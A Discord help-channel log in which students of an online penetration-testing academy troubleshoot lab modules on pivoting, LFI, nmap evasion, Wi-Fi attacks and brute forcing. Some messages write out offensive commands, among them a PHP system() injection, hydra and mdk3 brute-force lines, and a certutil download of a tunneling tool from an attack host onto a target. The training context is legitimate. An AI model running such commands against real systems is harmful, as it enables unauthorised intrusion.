Although I've check "chisel_1.9.1_windows_amd64" is an executable, I can't execute it with
chisel_1.9.1_windows_amd64 or & "C:\chisel_1.9.1_windows_amd64" (is not recognized as the name of cmdlet, ... or program) on Powershell
How could I "execute" it , or change to actually an executable (I've tried append .exe extension but not work)
Thanks

dapper moth
shut quest
supple meteor
#

yes, i've gunzip -d *.gz

#

oh it works, but after server-client connected, it seems like I cant access 172.16.x.x
should

#

should I restart?

#

(/etc/proxychains.conf
socks5 127.0.0.1 1080)

vagrant wraith
#

hi guys currently doing {Login Brute Forcing } | {Web services} ive successfully brute forced the creds and its giving me | sshuser@94.237.60.154: Permission denied (publickey). when tring to login

cloud urchin
#

looks like the wrong ip, that's a public ip. or you're on the wrong port.

vagrant wraith
#

yeah but that lab doesent require an openvpn to connect to the lab

#

nvm mind guys i got it lol

dull raven
#

I have questions about the student subscription, should I continue buying the modules with cubes or are they included when paying the $8 monthly?

storm elk
#

And modules you complete, are yours to keep

dull raven
#

so i dont have to pucharse cubes?

storm elk
#

No

dull raven
#

ok thanks

#

i will subscribe

full wagon
#

I've used Ligolo for pivoting going through other lab setups, but this is the first time I use it for double pivot. It's part of the pivoting and tunneling skills assessment. I have read several walkthroughs on it, and have so far:

  • To avoid any mismatch, I re-downloaded the proxy and agents from the same release.
  • I added a new ligolo tun interface to get the second pivot connected on that one.
  • I've tried different ports for the second pivot through the first (added listener).

But every time I execute the agent on the second pivot (windows) I get the same error on the Ligolo server:
ERRO[1845] dial tcp 127.0.0.1:11601: connect: connection refused

Does anyone recognize this error, has encountered it or understand what it's about? I have googled but cannot understand why it goes wrong.

Thank you for any input!

final shale
#

Honestly it seems like the wifi pentest module is a little buggy here and there 🙂

#

Not complaining. If you ask me a little buggy is best so its a bit like real world. 🙂

fervent iris
#

so i'm trying to get a reverse shell on one of the labs but i'm having an issue that the lab doesn't recognize the openVPN ip address.

the openVPN ip address is 10.10.14.102, i tried to run the following command on the target <?php system ("ping -c 3 10.10.14.102"); ?> just to assure that there is a valid connection. but the returned value is 100% lost..

what i'm i missing here?

final shale
#

Did you try to restart your VPN for good measure?

fervent iris
#

yes

final shale
fervent iris
#

the nibbles lab

final shale
#

there is a different VPN you have to download for the starting point section

#

O that is just a retired lab

#

in it not the starting point. my bad

fervent iris
final shale
#

can you ping the lab?

#

from your attack host

fervent iris
final shale
#

Well if you can ping the lab that means it is not a connection issue. It has something to with you are not doing something correctly. 🙂

fervent iris
#

i just check the network interface using ipconfig /all on my windows machine it returned this regarding openVPN status:

Unknown adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : TAP-Windows Adapter V9 for OpenVPN Connect
   Physical Address. . . . . . . . . : 00-FF-81-86-73-21
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.14.102(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . :
   NetBIOS over Tcpip. . . . . . . . : Enabled
#

so i used the correct ip address to ping from the lab to my machine

fervent iris
urban elk
#

windows doesn't respond to pings often

final shale
#

hold on.

fervent iris
final shale
#

yes if you have firewall enabled its not going to respond to ping

#

But what i dont understand is. You are connecting to the VPN on your windows and using a VM for linux or how? you just use windows with WSL to hack?

fervent iris
fervent iris
#

because i need to change some configs within WSL to allow bridge connection so i can use to for reverse shells

final shale
#

It depends if you set your firewall for a public or private network i believe

urban elk
#

try doing anyting else, like putting up a python http server, and see if that works

final shale
#

man you are making life hard for you i can tell you that. Just use a VM 😄

fervent iris
final shale
#

Try turning the firewall off and see

final shale
fervent iris
fervent iris
urban elk
#

change your payload to get something from it instead of pinging you, and see if that reaches you

fervent iris
rare swan
#

Topic LFI
cant read/find any file within /etc /var folder
can bypass ../ with double url encode
can only read error file with php wrapper base64 read resource which i fuzzed
Know its nginx and know the php version
Any approach how to gain rce?

final shale
#

Which lab exactly are you on? on the LFI section.
Can you access the accsses.log file of nginx?
when i was doing that module what was happening was my payload was crashing the access.log of nginx and i had to reset the lab

rare swan
#

i tried to access /var/log/nginx/access.log but dont get any result back

#

did a bunch of ../ before

final shale
#

You should have access to that the access.log file with LFI

#

but before that

#

did you find the hidden admin directory?

rare swan
#

Guess I have to do somehow log poisoning but cant access the log file...

boreal cypress
#

can anyone help with the last question at the hidden SSID section on the WI-Fi pen testing module? Cant seem to figure this one out

#

Identify the name of the hidden SSID with the BSSID d2:a3:32:1b:29:d5 and submit it as your answer.

#

Whatever way i choose to find the hidden SSID it dosent work and if it does it gives the name a previous Bssid

final shale
boreal cypress
#

i did and it is not the same as first question? "Cybernet-******"

final shale
#

Its not the same. you gotta use sudo mdk3......

boreal cypress
#

Am i doint someting wrong ? wifi@WiFiIntro:~$ sudo mdk3 wlan0mon p -f /opt/wordlist.txt -t d2:a3:32:1b:29:d5

final shale
#

It doesnt look like it. What is the output of this command?

boreal cypress
#

Nothing

#

Also there are no packets being sent to d2:a3:32:1b:29:d5 so cant use aireplay-ng either

rustic sage
#

Anyone can help me out on DACL Skills assessment, 3rd question i have got the laps password for WS01 but not able to rdp into the machine

final shale
rare swan
#

@final shale found the admin directory and the log file - used the user agent to write something to the log files (system/http/chat.log) but doesnt get logged if i search for the keyword

final shale
#

Man this host we RDP into on the wifi pentesting module is so slow...

final shale
rare swan
#

So I have to do lfi on the second parameter somehow?

final shale
cedar void
#

"Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer."

Is there an easy way to open a file without vim? I tried using nano but it doesn't work on my machine. I am having a really hard time attempting to edit the vim file for the question in this module section:

https://academy.hackthebox.com/module/51/section/1844

I hate vim

cedar void
#

not for this machine

dapper moth
#

pluma [file]

#

cat [file]

cedar void
#

cat is only for looking at the file I thought, not editing

#

Ill try pluma

final shale
#

Try vi

dapper moth
tacit bay
# dapper moth With the other sessions does it output ok!?

Also, this works fine when uploading godpotato onto the host & running it directly - I'm only encountering the subsequent "execute" command issues when I create a sacrificial process & inject the donut generated shellcode of godpotato into the process..

full wagon
full wagon
brave prawn
#

Hey guys, can someone explain how nopac module in netexec works? I read the theory of nopac, but i can't get how the one can decide if DC is vulnerable to nopac by comparing the sizes of TGT without PAC and TGT with PAC.

devout topaz
#

guys in the api module the target isn't alive , I tried accessing it deleting the cache , logging out , but nothing works

#

anyhelp ?

devout topaz
spiral phoenix
#

Hello, I'm doing the Linux enumeration module and in section 'Environment Enumeration' (https://academy.hackthebox.com/module/51/section/1592), I'm getting answer incorrect even tough I've found the flag.txt in the root folder. I tried submitting it in different formats but no luck : HTB{xxxxxxxxx}, {xxxxxxxxx}, xxxxxxxxx
Did anyone have an issue like this ?

fiery berry
rustic sage
boreal crest
#

Hello ! i'm doing the nmap's bases path, and i'm stuck in the Firewall and IDS/IPS Evasion - Hard Lab.
From the course i saw that there is a way to specify a source IP and a source port using -S and -g. My issue is, if i specify a source IP and target interface, i get the following error :

q@grospc:~$ sudo nmap 10.129.34.50 -n -Pn -p 445 -O -S 10.129.34.200 -e enp4s0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 14:54 CET
setup_target: failed to determine route to 10.129.34.50
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
#

failed to determine route to 10.129.34.50

dapper moth
boreal crest
#

you mean this page ?

boreal crest
#

but they dont cover how to configure this, they just show that you can specify a source ip and it directly works

final shale
#

You dont need to specify source ip to pass this module

boreal crest
#

ah, okay, i'll try to not use it then, but i'm still concerned on why it doesnt works on my machine

#

even on the pwnbox it doesnt works

final shale
#

but you are missing something crucial in the command.

boreal crest
#

ah

final shale
#

Scan all ports and make scan so it looks like DNS queries. 😉

boreal crest
#

so you mean i should use the -sU option to make udp scans ?

final shale
#

no

#

-sS is fine

#

find which port uses dns and make traffic from nmap go trough there

boreal crest
#

but arent dns servers / dns queries working with udp

#

mh this is what i get with -sS

m@grospc:~$ sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -sS --disable-arp-ping -g 53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 15:05 CET
Nmap scan report for 10.129.34.50
Host is up.

PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   filtered http
110/tcp  filtered pop3
139/tcp  filtered netbios-ssn
443/tcp  filtered https
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
final shale
#

Its a hint man. you are taking it too litteral 🙂

boreal crest
#

with udp scan it says open|filtered for all ports

final shale
#

You are close. scan all TCP ports

#

remove the top-10...

boreal crest
#

but i figured out that if i scan too many ports i get blocked

#

i will test

final shale
#

do -T2

#

in that case to be quiet but i dont think that was nessasry

boreal crest
#

oo yeah to be less aggressive

boreal crest
#

also without it just says that all ports are filtered

boreal crest
final shale
boreal crest
#

idk i cant get any port open 🤔

boreal crest
#

but in the hint they say this :

Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data
And the service 139/tcp netbios-ssn has been added which is meant to transmit heavy data traffic

#

i dont understand how to access this port in order to get more information on the service using nmap

final shale
#

i dont think the 139 port was the right one

#

I will check

boreal crest
#

here is the command i executed : sudo nmap 10.129.34.50 -n -Pn --top-ports=10 -g 53 -sS -D RND:5

#

mmh

final shale
#

Are you doing enum with nmap module and you are on the hard assesment lab?

boreal crest
#

yeap

final shale
#

you sure you are scanning the right thing? I get only 3 ports opened

#

sudo nmap 10.129.33.221 -sS -Pn -n --disable-arp-ping --reason -v -g 53

boreal crest
#

what wtf you got the results very fast, why do i have to wait for 5 mins for the nmap to complete

winter schooner
#

and try to connect to that port in a Different way not nmap to get your flag, and be patient wait 30 seconds

final shale
#

I think it maybe because nmap saved my scans.

#

sudo nmap 10.129.33.221 -sS -p- -Pn -n --disable-arp-ping --reason -v -g 53
this command should work just change the ip

boreal crest
#

and scan for source ports
Wdym scan for source ports 🤔

final shale
#

Not sure whats going on there buddy. It doesnt take that long for me.

boreal crest
#

🤔

final shale
#

The wifi labs are annoyingly laggy honestly.

#

Even the clipboard is laggy it needs like 2 seconds to copy anything from the terminal 😄

fervent iris
final shale
#

So you have outgoing connection from attacker to lab but not the reverse?

#

I still think its the firewall. Did you try disabling it temporarily?

fervent iris
final shale
#

You sure the windows one is also not on?

final shale
#

its a stupid firewall or AV

#

or something to do with WSL and that whole botched deal

#

created by Microsoft 😄

fervent iris
#

but it stumps me, i never touched the firewall and inserted rules related to openVPN, why did this happen? and how do i trace which rule is preventing incoming connections??

final shale
#

Bro no offence but didnt i tell you about the firewall 3 hours ago 😄

fervent iris
#

but thank you i must've doubted that turning off avast is enough to completely shut off the firewall 🙂

final shale
#

You dont even need Avast dude. Use just defender.

fervent iris
#

got no experience with firewalls yet 🙂

scenic current
#

I have the exact same problem. I even tried using nmtui but the connection I setup with the answers from question 1 and 2 doesn't even show up in the Activate list. I tried connecting to the non-hidden one and ran into similar troubles. It wouldn't be so frustrating if the machine wasn't so crazy slooooooow.

dapper moth
final shale
dapper moth
#

The module was well constructed as to perform the techniques taught throughout in a sequence

fervent iris
fervent iris
#

huh?

scenic current
dapper moth
#

That module isn't supposed to be hard.
If you are trying to hard, something must be wrong.

#

If you are experiencing issues related to lag or latency, you can always try using the Pwnbox

flat skiff
dapper moth
#

Also, by what HTB Staff have stated, there may be 2 paths to completing.
I've completed it without any effort because one of them was just too straight up after scanning for Wireless devices for the first flag.

scenic current
final shale
#

Perform a brute-force attack on the WiFi network named HackTheBox_Secure. What is the WPS PIN?
this is for the Attacking Wi-Fi Protected Setup (WPS) - Secured Access Points
Are you guys sure this is even possible? tried -L -N it doesnt seem to be working

dapper moth
#

Just don't wanna give any spoilers

scenic current
dapper moth
scenic current
old oasis
#

has pwnbox been lagging for anyone else today?

final shale
eager ledge
dapper moth
fervent iris
calm spire
#

Hi guys I am trying the windows fundamentals module, submodule: NTFS vs. Share Permissions and im trying to connect as a client to the windows server. But when i do i don't get the shares as a result. I get the error: do_connect: Connection to 10.129.46.255 failed (Error NT_STATUS_IO_TIMEOUT). What is exctly the error here? I realize that both my linux system and windows system i rdp'ed are seemingly not in the same subnet and thus i think i cant connect to each other? But If i do put them in the same subnet i will lose connection right?

#

Thanks for the help!

neon furnace
#

Intro to Whitebox Pentesting module, I'm doing the patching exercise. I've literally patched the code, and I don't see how code injection is possible, since I removed the dynamic function creation, and the only thing the user input is used for is in a console.log and Math.floor call, where code injection is not possible, afaik. How the hell is this patch endpoint thing finding injection still? Can someone enlighten me?

normal sand
shut quest
normal sand
shut quest
winter schooner
#

maybe its named like Flag.txt

neon furnace
# neon furnace Intro to Whitebox Pentesting module, I'm doing the patching exercise. I've liter...

solved by moving sanitization outside of calling the password generation function, instead of at the start of the function... I think this module should be reviewed. It's generally best to validate input INSIDE the function, because then the caller is not responsible for sanitizing their own input. Also, it doesn't matter where the sanitization is in this case, so not sure why the tool flags the sanitization inside the function

shut quest
cloud urchin
#

you don't have the permissions required to access that dir

swift gale
#

Greetings I have created account with my academic email and for some reason it doesn’t allow me to choose the student discount plan

#

Is there someone who can help me with this issue ?

compact patrolBOT
swift gale
#

Thank !

shut quest
#

What module and section?

shut quest
#

You need to read the section again, it spells out how to do it.

eager ledge
eager ledge
limber river
#

ARE YOU SERIOUS ?

shut quest
#

<@&861185840277487616>

karmic mason
#

😂

limber river
#

lol

karmic mason
#

Twice

surreal rain
#

sigh...

rustic sage
#

damn the skill assessment was challenging

trail sail
#

Can someone give me a nudge for this section to be able to read the flag:
Attacking Common Applications - Skills Assessment I?
I have tried everything to read the content of flag.txt,
but nothing works except for the dir command.
I also attempted to use type, more, and less,
but they didn’t work either.

I tried using PowerShell instead:

plaintext

Get-Content flag.txt

But nothing worked.

I have tried both exploits in Searchsploit, but the only thing that worked was Gobuster, which helped me find this file path.

cloud urchin
#

what happens if you do it in your browser instead of burp, it looks like your get request is off but i could be wrong

cloud urchin
#

alright, well your burp looks wrong, i think it should be different color than the "GET" part but i could be wrong

trail sail
#

No. Burp works well too but the problem is the command, only dir works

cloud urchin
#

maybe encode it all?

dapper moth
#

If you got RCE via web shell and you are getting problems reading files, why not move to a reverse shell!?

trail sail
trail sail
#

What happened? lol the target machine is different now

cloud urchin
#

you had a different port in your previous screen shot

trail sail
#

ok i need to rest lmao

#

I did it. Thanks

rustic sage
#

Is there any way I can make the module "the live engagement" under shells and payloads faster

#

?

rustic sage
dapper moth
winter schooner
rustic sage
#

Whoever came up with the idea for making a cheatsheet at the end of every module deserves a raise.

#

You can download them as PDF and save them in Obsidian

terse sedge
#

I can't ping machines from my local machine, but can when I'm in pwnbox. I'm in "getting started - privilege escalation." I'm connected to the VPN, any idea?

rustic sage
#

Do a sudo killall openvpn; sudo openvpn ~/Downloads/academy-regular.ovpn

ocean night
#

*and make sure you don't have a Pwnbox running at the same time as trying to VPN in from your local machine

void hemlock
#

Sick module!

next osprey
#

if i cancel my HTB Academy subscription, will i only retain access after my a module if i have 100% completed it or is simply enrolling in it enough?

ocean night
next osprey
terse sedge
#

I ran sudo killall openvpn, and made sure I don't have any Pwnbox running, still can't ping boxes. I logged out of HTB, restarted my VM, logged back in, connected to VPN, and still can only ping from within Pwnbox.

cloud urchin
#

have you recently switched vpn regions?

ocean night
#

Do you get any errors from the openvpn command on your local VM?

terse sedge
#

I don't see any errors

#

Is it normal to get the same IP in Pwnbox, as the VPN gives you locally?

#

Haven't switched regions

ocean night
#

Yes

#

Want to take this to DM duvel?

cloud urchin
# terse sedge Haven't switched regions

ok. do killall -9 openvpn, in your browser press CTRL+SHIFT+R, then terminate the target, then shut down your VM entirely. reboot your host PC. after that launch your VM, connect to the VPN, click spawn target, and wait 5 mins for it to fully spawn, then try again.

ocean night
#

Well, you're connected to the VPN from somewhere, and that client is reachable

cloud urchin
ocean night
#

I.. would have thought so

cloud urchin
#

i guess he said he could ping from the pwnbox

terse sedge
#

This one does if I'm in Pwnbox

rustic sage
#

Curious if your VM has internet access. Don't want to overstep someone else troubleshooting but if not, do a 'sudo systemctl restart NetworkManager && sudo systemctl status NetworkManager && ping 1.1.1.1'

ocean night
#

I can help diagnose in DM if you want @terse sedge - I do see a connection currently

#

Otherwise I'd say change server and try again. If that does not help, raise a ticket with the support team.

terse sedge
#

I can't ping 1.1.1.1

ocean night
#

Routing overlap of your local network and the HTB network possibly? :\

#

What do you get from ip route list ?

#

Again, you can share in DM if you want, instead of here.

terse sedge
#

sure

ocean night
#

The IP you mentioned for the target.. it's not active any more btw

#

Perhaps you need to start it again?

terse sedge
#

Should see it now

ocean night
#

I do, and I can ping it. Sent a DM with a few questions

#

That kind of interactive portion does not require VPN access, btw.. but if you can't ping it from VM then there's obviously something wrong

ocean night
#

Ask for advice, not for the answer.

tranquil garnet
#

I asked for the advice because I want to learn and improve

crimson moon
tranquil garnet
#

I got it but I don't fully understand why

crimson moon
dim wolf
tranquil garnet
#

Try this @crimson moon hashcat -m 17200 timelapse.hash /usr/share/wordlists/rockyou.txt

#

For some reason john doesn't recognize the format automatically that's my assumption

crimson moon
#

Is Timelapse.hash the output after you do zip2john?

tranquil garnet
midnight galleon
#

how to fix kerberos time skew?

tranquil garnet
#

Instead of mode 17200 for hashcat try 17210 or 17220

#

You have hashcat examples when you can look upm the hashes to identify them

#

As I recall I think I solved it like that

#

@crimson moon let me know of the results

midnight galleon
#

how do i feed impacket the server time?

#

tried faketime/ntpdate $IP but no avail

crimson moon
tranquil garnet
#

Send me a DM let me try it @crimson moon

knotty gust
#

Anyone else having issues with the RDP question in the Password Attacks module, Network Services section?

I know what the user is, I get a hit with hydra if I pass in the exact user and password. However, if I pass in the exact user and a password list, I will not get a hit even with an extremely slow brute force command

hydra -L ./user.txt -P ./Desktop/Shared/HTB\ Academy/Password-Attacks/password.list rdp://10.129.239.175 -t 2 -W 4

#

It seems like the only way to get a hit on the RDP service is to pass in the exact values, and some users on the forums have mentioned having issues with the RDP service in the past as well

next osprey
knotty gust
#

All of the other services work fine

#

It's just RDP causing problems

sonic ridge
#

im trying to do the enumerating users section of the broken authentication module and when I try to run the ffuf command it says command not found

knotty gust
#

sudo apt install ffuf

sonic ridge
#

thank you

midnight galleon
#

impacket tool to add user to a group?

green cypress
#

Attacking Common Applications - Attacking Thick Client Applications
Can anyone can give me a pointer to what I need to do here? I've read on the forums the importance of finding the red arrow but in the module I see a red arrow going down one line, smallest red arrow I found is going down two rows and when I follow those in Memory Map they do not have a row "User - Map - RW"

cloud urchin
#

scroll down the memory map tab?

fathom pendant
green cypress
green cypress
fathom pendant
#

The section explicitly tells you what to do, and what breakpoint to set

fierce iris
#

in the getting started module for privelege escalation i cannot understand how to obtain the flag for the second question.

https://academy.hackthebox.com/module/77/section/844

i cant run any scripts. none of the commands or walkthroughs seem to even remotely steer me in the correct direction, and i think its due to just slapping two huge repositiories for enumeration in front of people and saying "figure out which one works" bc as simple as the answer probably is, I cant figure out how to get root. i got to user 2. the hint says "dont forget to chmod" ive been on this for a week.

cloud urchin
fierce iris
#

you know, i had the thought, but didnt really know how to execute so i didnt investigate. i'll look into that!

cloud urchin
#

yep, whenever you gain access to another user you want to see what kind of permissions that user has that you may not have had access to before. looks like user2 can read something in there.

unborn summit
#

on the task at the end of file inclusions - php wrappers i was able to get RCE from both the data wrapper and the input wrapper. But I cannot for the life of me figure out how to do the same with the expect wrapper, despite it being installed. my payload is ||curl -s "http://94.237.63.109:37671/index.php?language=expect://id"|| but it just returns the normal page. any hints would be much appreciated.

brave scroll
#

I am stuck on :
Shells & Payloads
The Live Engagement.
Host # 1
Issue: i have run payload many time and wait for even 30mnts also to receive reverse shell connection but no results.

cloud urchin
#

your lhost looks off

#

may want to delete the pics though not really it's needed here, kinda gives part of it away

brave scroll
cloud urchin
#

your lhost is your listening host, do you have a nic that has 172.x.x.x?? your vpn is probably 10.x.x.x

brave scroll
cloud urchin
#

well metasploit can't listen on an ip you don't have on the same box that metasploit is running off of

brave scroll
#

i also have tried nc

ocean night
#

..but perhaps not included in that module

brave scroll
cloud urchin
#

i know metasploit has an autoroute feature but i haven't really used it, and yeah i don't think it's included in that module

brave scroll
#

here it is

cloud urchin
#

I only used it like once, in the pivoting module i think.. so yeah i'm not that familiar with it. i generally avoid metasploit if i can.

brave scroll
cloud urchin
ocean night
#

That's > Tier 0, so please take advice to DM 🙂

unborn summit
signal shadow
#

Guys I am new on HTB how am I suppose to prepare for mobile cahallenges there are no modules in academy

cloud urchin
unborn summit
cloud urchin
#

i don't know

#

i know it's not enabled by default

full wagon
empty trout
#

copy : Cannot find path '\\192.168.1.19\MYSHARE\supersecretpass.txt' because it does not exist. At line:1 char:1 + copy \\192.168.1.19\MYSHARE\supersecretpass.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\192.168.1.19\...rsecretpass.txt:String) [Copy-Item], ItemNotFoundExce ption + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand i am getting this error while transferring files with smbserver

autumn pilot
#

verify the IP address

empty trout
#

i can ping the ip and ip is correct

green cypress
#

In my experience it should usually be a 10.10.x.x IP

#

or 10.129.x.x for the target

empty trout
#

i am running a vm on my local network

green cypress
#

but you're connecting to HTB resources right via vpn

#

not sure if that could be it

empty trout
#

no i am locally doing it

#

i can ping the ip and i set the vm to bridge adaptor bcz nat have some issue i dont know .

#

the request is coming to the smb server with an ntlm hash

#

but closintg down the connection

green cypress
#

hash is coming from HTB victim box?

empty trout
green cypress
#

ah not sure then sorry

cloud urchin
empty trout
#

moduel file transfers in windows file transfer section in #smb downloads

cloud urchin
empty trout
#

no i am locally doing that

#

i found many people are facing the same problem

cloud urchin
#

smbserver works fine, you're doing weird stuff locally with nat

#

that's not part of the module to locally transfer between your host and vm

empty trout
#

it works

#

with creds

#

i am using bridge adaptor . yeah i know things will get complicated in nat . it doesnt matter if the connection is local or remote . smb will work fine

#

its the problem of smbserver i have the latest one from github maybe u downloaded it with repo

cloud urchin
#

probably the version of smb you're using, i think smbv2 requires creds

#

but your error indicated the path didn't exist/couldn't connect so idk.

empty trout
#

the connection is coming to the server

#

then connection refused

#

i am getting ntlm hash so there is auth but there is no auth on my share so we have to set auth on smb share too

final shale
#

I am so curious as to how HTB made the wifi labs. 🙂

#

Everyone asleep? You have to be more dedicated guys 😄

dawn fog
#

this was the question i was given: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

this is what i put in for the command: curl -s https://www.inlanefreight.com/ | grep -oP 'href="https://www.inlanefreight.com[^"]*"' | sed 's|https://www.inlanefreight.com||' | sort -u | wc -l

but i still got the question wrong, why?

dawn fog
#

i was able to solve it using AI, but non urgently if someone could describe to me what this all means that would be awesome

solemn jasper
#

I've finished writing the report for the Documentation and Reporting Skill Assessment. Would anyone with experience like to take a look and give me feedback?

final shale
neon furnace
#

Is Introduction to Deserialization Attacks PHP lab only very unstable for me? Seems like it takes minutes to load the pages every time, also times out from time to time. Restarting the target didn't help

boreal cypress
#

Can anyone help me with the Skill Assessement on Wifi pentesting basics? What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5? Cant seem to find out the pass . I managed to find the answer for the first question

open hamlet
acoustic owl
rancid zephyr
#

Anyone having issues with metasploit snd Parrot 6.2? across several modules I get the same error “can not load stdapi” and “load stdapi” does not work. But my parrot 6.1 vm and the pawn box work

normal sand
#

Module: Windows Privilege Escalation
Section: Windows Privilege Escalation Skills Assessment - Part I
Link to section: https://academy.hackthebox.com/module/67/section/637

I managed to obtain a reverse shell and have tried most manual enumeration stuff and even used a few tools shown in the module, and even checked metasploit. I've prolly missed something. Could someone please give me a nudge?

Edit: I managed to get the flag, however, I have a couple questions. I can't ask the questions here without revealing info, so please DM me if you'll be fine answering my questions. I managed to privilege escalate, but haven't got the answer to question 2. If someone could also nudge me on question 2, I'd greatly appreciate it.

dawn fog
fathom pendant
fading violet
#

One message removed from a suspended account.

fathom pendant
fading violet
#

One message removed from a suspended account.

#

One message removed from a suspended account.

plain trellis
fathom pendant
fading violet
#

One message removed from a suspended account.

#

One message removed from a suspended account.

fathom pendant
#

It's in your settings page, as stated in the message

#

Literally step 1

shut vapor
#

In Active Directory Enum & Attacks > Bleeding Edge Vulnerabilities with something like NoPAC, Print Nightmare or PetitPotam, and probably loads more... what's the efficient way of identifying the likelihood that these exploits are worth a shot. The reading material covers just 3, but assuming there are a dozen more and variants of each, running individual checkers or just trying them seems like the wrong strategy.

#

or maybe I'm thinking about this wrong.

shut vapor
#

Thanks, I was hoping this would be covered more going forward... like in Windows Priv Esc. ||and who isn't lazy when it comes to tedious checklists that can be automated?||

dapper moth
#

I mean... For AD you can always use Bloodhound or Adalanche
They will show you a straighter path to Domain Compromise

#

But I like detailed output, so I always go for PowerView first

weak kindle
#

Anyone who completed "Active Directory Trust Attacks module"?? If yes can you reply to this message I will DM you with my doubts!

tidal wharf
#

Hey guys! This is the only channel I found in which I could write something. I am a Software Engineer and I would like to change my career path into cyber security. I hold technical knowledge in software and IT but maybe I do not hold so much knowledge in cyber security. Is it okay if I go and directly start one of the intermediate career paths, or should I start with the Information Security Foundations? Do they give some introductions into the different job paths in the Information Security Foundations path? Thank you in advance

weak kindle
tidal wharf
#

I do not have access to that link 😦

cerulean hinge
#

Hello,

I just finished the Medium - Skills Assesment for the Password Attacks module however I'm not sure that I really understood the last part (it was a hint on the HTB forum that made me try what I did).
So I managed to connect "d" user. But from there I couldn't find any hint to get root password. And the hint said that we must reuse the stuff we found, and from there I used stuff on the dennis home directory and managed to be root.
But for me it's like a really big guess or maybe I've missed an important piece of information that points me in the right direction ?

fathom pendant
#

I believe that's the one with the pw protected file yeah?

#

Just logical leaps

#

Always test for reuse, basically

quartz cloud
#

Hey ! Could someone help me ?
I ended the whole sqlmap essentials module excepted one question, the case 11 of bypassing Web application protection, i would assume that my tampers are great but still "unable to retrieve column" / "unable to enumerate colomn" for the tables. Could someone help me on this pls ?

cerulean hinge
# fathom pendant I believe that's the one with the pw protected file yeah?

It is an encrypted rsa private key in the folder of the "d" user but which can be used to connect as root. I understand that we must always try to reuse what we found but isn't too much here ? I thought there was an information somewhere on the asset that would indicate that we must use the rsa key for root account.

plain trellis
quartz cloud
fathom pendant
midnight galleon
#

if an account is ASREPRoastable, can't we just use the TGT from that account and keep passing it? is the actual password useful in anyway?

novel parrot
#

"custom wordlists" on brute force

#

am i supposed to input the examples info into CUPP and anarchy?

#

or is it another thing that i need to OSINT

midnight galleon
novel parrot
nova ginkgo
#

hello
how can i get help for pro labs

storm elk
novel parrot
nova ginkgo
#

I have a problem can i send your dr screenshot

storm elk
#

Sure

novel parrot
#

yo @storm elk could you help me out?

storm elk
#

I’m not at my pc

novel parrot
#

oh ok

#

its just that it does not tell you to use any info

#

and even when i did the module it hasnt actually gone through

storm elk
#

No info found on the site?

novel parrot
#

nope

plain trellis
# novel parrot nope

You just need to follow along with section text, it's clearly explained there and should be working

novel parrot
#

maybe i mistyped i guess, but the wordlist i did is the same as in the text

#

does it take a lot when you did it?

#

or did it go thorugh almost instantly

plain trellis
#

must've made a typo or something. Try doing the steps again

novel parrot
#

bet

#

module is wrong @plain trellis

gloomy bramble
#

Pivoting, Tunneling, and Port Forwarding skiill assessment Q # 4 Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer. I already ssh into m* creds, foudnd the 172 ip with the ping sweep. I am having issues using proxychains xfreerdp. tried metasploit too, but nothing doing. Any hints would be appreciated.

novel parrot
#

ure not supposed to do the grep thing if u dont do it it does work instantly

#

idk why they put htat there

plain trellis
novel parrot
#

wierd i guess

#

the only time it worked is when i didnt do it

plain trellis
midnight ravine
#

anyone down to help me w/ a web enum module on the cpts path?

analog dock
midnight ravine
#

Information Gathering - Web Edition

#

Final skill assesment

#

q3

#

What is the API key in the hidden admin directory that you have discovered on the target system?

gloomy bramble
midnight ravine
#

idfk what to insert into etc/hosts, and what to put in fuff/gobuster, w/ port, w/out port, it finds NOTHING, used like 8 wordlists, consulted w/ a friend who finished the module and got the answer, we literally PUT THE DAMN ANSWER in an empty wordlist, tried again and nothing...

timber crest
#

Can anyone help me with the Conditional Branching exercise in the Intro To Assembly Language module?
I don't think I really understand the question tbh. The question is "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?"

Surely the answer to this is 0 or 0x0 but these are not the right answer.

plain trellis
midnight ravine
#

anyhow if anyone can help me w/ this crap i'd be in their debt forever and will chase your enemies w/ ancient blood rituals from beyond the abyss, please hmu on dms

plain trellis
gloomy bramble
midnight ravine
timber crest
#

Sorry ignore my previous post. It's actually really obvious.

#

It was assembly code I didn't understand rather than the question.

plain trellis
rustic sage
#

For AD Enumeration & Attacks - Skills Assesment Part 1 I'm struggling to get a proxy set up. I logged into the Antak webshell (no spoiler), created a rev shell and uploaded Chisel.exe. Absolutely no progress after that because it doesn't seem to be working. Any tips?

#

||

certutil -f -urlcache -split http://10.10.15.234/Chisel.exe C:\Users\Administrator\chisel.exe ipconfig (grab network range)

[On Linux host] └─$ chisel server -v -p 9002 --socks5 2024/11/03 12:56:44 server: Fingerprint Hg+/LqL1YH8w4HYVUTXouCWtH8m7YECuNz8p1Sah8/s= 2024/11/03 12:56:44 server: Listening on http://0.0.0.0:9002
[Back to Windows]
C:\Users\Administrator\chisel.exe client -v 10.10.15.234 socks
... No output||

novel parrot
#

cuz ftp does not conenct to me, also the answer to the first flag is not the one found in the last skill assesment is it?

#

like in pt 1

plain trellis
novel parrot
#

nvrmind

wide narwhal
#

